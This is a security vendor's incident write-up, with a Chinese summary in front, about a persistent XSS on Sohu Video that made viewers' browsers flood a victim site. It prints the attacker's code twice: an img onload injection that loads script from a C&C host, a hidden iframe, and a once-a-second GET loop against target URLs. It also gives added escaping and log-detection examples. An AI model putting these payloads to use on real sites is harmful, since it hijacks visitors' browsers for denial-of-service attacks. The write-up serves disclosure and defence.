from: One of World’s Largest Websites Hacked: Turns Visitors into “DDoS Zombies”
Incapsula found that one of its customers was hit by an application-layer DDoS attack.
Roughly 22,000 Internet users sent about 20 million GET requests to the customer's website.
The attack exploited a persistent XSS: find an XSS on a website with very high traffic, inject a piece of JavaScript there, and once that site's users visit the page, their browsers are used to attack the victim.
Some sample code:
```html
// JavaScript injection in <img> tag enabled by persistent XSS
<img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" />

// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
  $("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>");
}

// Ajax DDoS tool in <iframe> executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg');
function ddos(url,url2){
  window.setInterval(function (){
    $.getScript(url);
    $.getScript(url2);
  },1000)
}
</script>
</body></html>
```
This technique is very effective once an XSS is found on a video site with huge traffic, because videos are usually not short: for the whole time a visitor spends watching, their browser unknowingly becomes the attacker's tool and keeps sending requests to the victim site.
The site abused in this case was Sohu Video, ranked 27th in the world by traffic. XSS code could be inserted in the video area, so every user watching that video could be made to send requests to the victim continuously.
Note: the effect of the attack is one request per second to each of the links given as url and url2. If a video is 30 minutes long, every viewer sends 1,800 meaningless attack requests (CC-attack style) to each of the two targets while watching; and if tens of thousands of people are watching a popular video...
One of World’s Largest Websites Hacked: Turns Visitors into “DDoS Zombies”
Yesterday we mitigated a unique application layer DDoS attack against one of our clients. The attack was carried out using traffic hijacking techniques, which flooded our client with over 20 million GET requests originating from the browsers of over 22,000 Internet users – all turned into unwilling accomplices by the offender.
What makes this case especially interesting is the fact that the attack was enabled by a vulnerability in one of the world’s largest and most popular sites – one of the domains on Alexa’s “Top 50” list.
We can’t disclose the domain name in question at this time, as our team is now working to resolve the breach. However, we will provide further details, once the vulnerability is fixed.
Having said that, we can already describe the method used by the attackers, in the hopes that it will help prevent similar abuse of other websites.
Persistent XSS Enables Large-Scale DDoS Attack
The site in question is a high profile video content provider, which allows its users to sign in with their own profiles. The DDoS attack was enabled by a Persistent XSS vulnerability that allowed the offender to inject JavaScript code into the <img> tag associated with the profile image. As a result, every time the image was used on one of the site's pages (e.g., in the comment section), the malicious code was also embedded inside, waiting to be executed by every future visitor to that page.
Each time a legitimate visitor landed on that page, his browser automatically executed the injected JavaScript, which in turn injected a hidden <iframe> with the address of the DDoSer's C&C domain. There, an Ajax-scripted DDoS tool hijacked the browser, forcing it to issue a DDoS request at a rate of one request per second.
Obviously one request per second is not a lot. However, when dealing with video content of 10, 20 and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively creating a self-sustaining botnet comprising tens of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.
```html
// JavaScript injection in <img> tag enabled by persistent XSS
<img src="/imagename.jpg" onload="$.getScript('http://c&cdomain.com/index.html')" />

// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
  $("body").append("<iframe id='ifr11323' style='display:none;' src='http://c&cdomain.com/index.html'></iframe>");
}

// Ajax DDoS tool in <iframe> executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('http://www.target1.com/1.jpg', 'http://www.target2.com/1.jpg');
function ddos(url,url2){
  window.setInterval(function (){
    $.getScript(url);
    $.getScript(url2);
  },1000)
}
</script>
</body></html>
```
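The `<img>` injection above, and the Chinese summary's description of it, both come down to an untrusted profile-image value being concatenated into an HTML attribute. The following is an added example, not Incapsula's or Sohu's code: the vulnerable template beside its attribute-encoded form, run against a constructed payload of the same shape as the one in the article (the host `cnc.example` and the function names are assumptions).

```javascript
// Added example (not Incapsula's or Sohu's code): the profile-image markup is
// built from an untrusted value in two ways. renderUnsafe() concatenates the
// value straight into the tag, so a crafted value can close the src attribute
// and append an onload handler, exactly the injection shown above.
// renderSafe() attribute-encodes the value, so the same input stays inert.

function escapeAttr(value) {
  // Encode every character that can end or alter a quoted HTML attribute.
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Vulnerable: the attacker-controlled path is pasted into the attribute as-is.
function renderUnsafe(profileImage) {
  return '<img src="' + profileImage + '" />';
}

// Hardened: the same template, but the value is encoded before insertion.
function renderSafe(profileImage) {
  return '<img src="' + escapeAttr(profileImage) + '" />';
}

// True when the markup is still a single quoted src attribute followed by the
// tag close, i.e. the untrusted text never escaped its attribute value.
function srcStaysContained(html) {
  return /^<img src="[^"]*" \/>$/.test(html);
}

// Constructed payload in the shape the article describes: it closes src and
// adds an onload handler that pulls a script from an attacker-chosen host
// (cnc.example is a placeholder, not the real C&C domain).
const PAYLOAD = '/x.jpg" onload="$.getScript(\'http://cnc.example/i.html\')';

console.log(renderUnsafe(PAYLOAD)); // src closed early, onload handler is live
console.log(renderSafe(PAYLOAD));   // one src attribute, the handler is just text
```

A Content-Security-Policy whose script-src is limited to the site's own origin (and has no 'unsafe-inline') would have stopped both the inline onload handler and the $.getScript() fetch from the C&C domain, as a second layer behind output encoding.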
Intercepting the Attack
The attack was blocked by Incapsula’s progressive challenges and behavior-based security algorithms, made that much more effective by the predictable behavior of the DDoS tool. By intercepting the malicious requests, we were also able to track the source of the attack. We did this by replacing the content of the target URL with a snippet of our own JavaScript, which reported the original referral source – leading us to the abused video website.
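The two properties the paragraph relies on, a metronomic one-request-per-second rate and a Referer pointing at the C&C iframe page, can be turned into a simple log check. This is an added example, not Incapsula's detection logic; the log lines, IPs and the `cnc.example` host are constructed, and the thresholds are assumptions.

```javascript
// Added example, not Incapsula's detection code: a small analyser for the
// fingerprint described above, many distinct client IPs fetching one URL at a
// steady one-per-second rate, all carrying the same Referer (the C&C iframe page).

// "10/Apr/2014:12:00:03 +0000" -> epoch seconds, applying the UTC offset.
function parseClfTime(s) {
  const m = /^(\d\d)\/(\w{3})\/(\d{4}):(\d\d):(\d\d):(\d\d) ([+-])(\d\d)(\d\d)$/.exec(s);
  const month = "JanFebMarAprMayJunJulAugSepOctNovDec".indexOf(m[2]) / 3;
  const utc = Date.UTC(+m[3], month, +m[1], +m[4], +m[5], +m[6]) / 1000;
  return utc - (m[7] === "+" ? 1 : -1) * (+m[8] * 3600 + +m[9] * 60);
}

const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "\w+ (\S+) [^"]*" \d+ \S+ "([^"]*)"/; // combined log format
function parseLine(line) {
  const m = LINE_RE.exec(line);
  return m ? { ip: m[1], time: parseClfTime(m[2]), path: m[3], referer: m[4] } : null;
}

// Report every (path, referer) pair requested by at least minClients distinct
// IPs whose own requests arrive every `period` seconds (within `tolerance`).
function findHijackedBrowserFloods(lines, { minClients = 3, period = 1, tolerance = 0.5 } = {}) {
  const groups = new Map(); // "path\treferer" -> Map(ip -> [epoch seconds])
  for (const r of lines.map(parseLine).filter(Boolean)) {
    const perIp = groups.get(r.path + "\t" + r.referer) || new Map();
    perIp.set(r.ip, (perIp.get(r.ip) || []).concat(r.time));
    groups.set(r.path + "\t" + r.referer, perIp);
  }
  const findings = [];
  for (const [key, perIp] of groups) {
    let metronomic = 0;
    for (const times of perIp.values()) {
      times.sort((a, b) => a - b);
      const gaps = times.slice(1).map((t, i) => t - times[i]);
      if (gaps.length >= 2 && gaps.every((g) => Math.abs(g - period) <= tolerance)) metronomic++;
    }
    const [path, referer] = key.split("\t");
    if (metronomic >= minClients) findings.push({ path, referer, clients: metronomic });
  }
  return findings;
}

// Constructed sample: four browsers fetching /1.jpg once a second with the C&C
// iframe page (placeholder host) as Referer, plus one ordinary visitor.
function clfLine(ip, sec, path, referer) {
  const ts = "10/Apr/2014:12:00:" + String(sec).padStart(2, "0") + " +0000";
  return `${ip} - - [${ts}] "GET ${path} HTTP/1.1" 200 512 "${referer}" "Mozilla/5.0"`;
}
const CNC = "http://cnc.example/index.html";
const SAMPLE_LOG = [clfLine("10.0.0.9", 0, "/index.html", "-"), clfLine("10.0.0.9", 7, "/about.html", "-")];
for (const ip of ["10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4"])
  for (let s = 0; s < 4; s++) SAMPLE_LOG.push(clfLine(ip, s, "/1.jpg", CNC));
```

Running findHijackedBrowserFloods(SAMPLE_LOG) reports the /1.jpg group with four metronomic clients and the shared Referer, which is the value that pointed Incapsula back at the abused video site.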
We were then able to replicate the Persistent XSS responsible for the attack. Once we had all of this information in hand, we quickly reached out to the site support team, offering our help in fixing the issue.
It should be noted that yesterday the original DDoS tool on the attacker’s C&C domain was replaced with a much more robust version. This leads us to believe that what we saw yesterday was a sort of POC test run. The current code is not only much more sophisticated, but it is also built for keeping track of the attack, for what seems like billing purposes. From the looks of it, someone is now using this Alexa Top 50 website to set up a chain of botnets for hire.
Update: April 24
No, it wasn’t YouTube
The disclosure of this vulnerability received extensive media coverage, which was accompanied by numerous attempts to guess the website’s identity. By far, the most popular assumption was that this story is about YouTube. While we wanted to debunk that rumor, we couldn’t allow ourselves to be drawn into a “twenty questions” game, which would inevitably provide additional clues to the vulnerable website’s true identity.
Now, with the vulnerability patched, we can divulge that the site in question is Sohu.com (Chinese for “Search-fox”) – China’s 8th largest website and currently the 27th most visited website in the world.
While being relatively unfamiliar to Western audiences, Sohu is a local and global powerhouse. This rapidly growing $2.5 billion organization provides a variety of search and content solutions, including Sohu.TV – the video streaming service that enabled the DDoS attack to occur.
Once we uncovered the source of the browser-based DDoS attack and replicated the persistent XSS vulnerability that allowed it to occur, we immediately went on to share our findings with Sohu's security team. With this information in hand, the Sohu team could quickly evaluate the problem and respond with a rapid patch which fixed the security hole, rendering this browser-based botnet completely useless.
Co-Authored by: Ofer Gayer – Incapsula’s Security Researcher